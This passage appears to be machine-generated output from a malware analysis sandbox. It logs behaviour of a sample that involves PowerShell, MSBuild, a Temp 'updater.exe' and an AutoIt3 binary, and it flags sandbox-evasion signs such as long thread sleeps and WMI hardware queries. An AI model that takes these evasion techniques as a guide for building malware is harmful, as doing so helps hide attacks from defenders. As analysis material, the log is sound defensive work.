                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe    Process information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe    Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe    Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe    Process information set: NOOPENFILEERRORBOX
                    Source: C:\faggbgb\AutoIt3.exe    Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe    WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe    WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe    Memory allocated: 11E0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe    Memory allocated: 2E70000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe    Memory allocated: 2C70000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe    Memory allocated: 1780000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe    Memory allocated: 31A0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe    Memory allocated: 2F50000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe    Memory allocated: D40000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe    Memory allocated: 2750000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe    Memory allocated: 2690000 memory reserve | memory write watch
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe    Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe    Thread delayed: delay time: 600000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Window / User API: threadDelayed 5548
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Window / User API: threadDelayed 4144
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Window / User API: threadDelayed 5141
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Window / User API: threadDelayed 4574
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe    Window / User API: threadDelayed 4650
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe    Window / User API: threadDelayed 4837
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe    API coverage: 5.8 %
                    Source: C:\faggbgb\AutoIt3.exe    API coverage: 5.8 %
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7736 | Thread sleep time: -18446744073709540s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7868 | Thread sleep count: 5141 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7872 | Thread sleep count: 4574 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7900 | Thread sleep time: -9223372036854770s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976 | Thread sleep time: -34126476536362649s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976 | Thread sleep time: -360000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -30692s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976 | Thread sleep time: -59875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976 | Thread sleep time: -59766s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -54471s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976 | Thread sleep time: -59656s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -43921s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976 | Thread sleep time: -59547s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -35162s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976 | Thread sleep time: -59437s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -50171s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976 | Thread sleep time: -59328s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976 | Thread sleep time: -59219s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -32208s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976 | Thread sleep time: -59109s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976 | Thread sleep time: -59000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -53974s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976 | Thread sleep time: -58891s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -50022s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976 | Thread sleep time: -58781s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -57186s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5976 | Thread sleep time: -58670s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -40910s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -31910s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -41691s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -50346s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -37549s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -31155s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -45286s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -42614s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -37854s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -59864s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -52502s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -45406s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -57596s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -47070s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -48095s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2716 | Thread sleep time: -480000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -38277s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -47898s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -48758s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -48016s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -54262s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -39165s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -49810s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7164 | Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -41851s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -48637s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -35260s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -34191s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7652 | Thread sleep time: -51059s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7176 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2220 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\faggbgb\AutoIt3.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\faggbgb\AutoIt3.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_01024005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_0102C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_0102494A GetFileAttributesW,FindFirstFileW,FindClose
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_0102CD14 FindFirstFileW,FindClose
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_0102CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_0102F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_0102F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_0102FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_01023CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_015F53CD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_015F54D5 FindFirstFileA,GetLastError
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_015F2CFD GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_00A04005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_00A0C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_00A0494A GetFileAttributesW,FindFirstFileW,FindClose
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_00A0CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_00A0CD14 FindFirstFileW,FindClose
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_00A0F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_00A0F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_00A0FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_00A03CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_01093125 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_0109322D FindFirstFileA,GetLastError
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_01090A55 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_00FD5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 60000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 30692
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 59875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 59766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 54471
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 59656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 43921
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 59547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 35162
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 59437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 50171
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 59328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 59219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 32208
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 59109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 59000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 53974
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 58891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 50022
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 58781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 57186
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 58670
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 40910
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 31910
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 41691
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 50346
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 37549
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 31155
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 45286
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 42614
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 37854
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 59864
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 52502
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 45406
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 57596
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 47070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 48095
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 60000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 38277
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 47898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 48758
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 48016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 54262
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 39165
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 49810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 41851
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 48637
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 35260
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 34191
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 51059
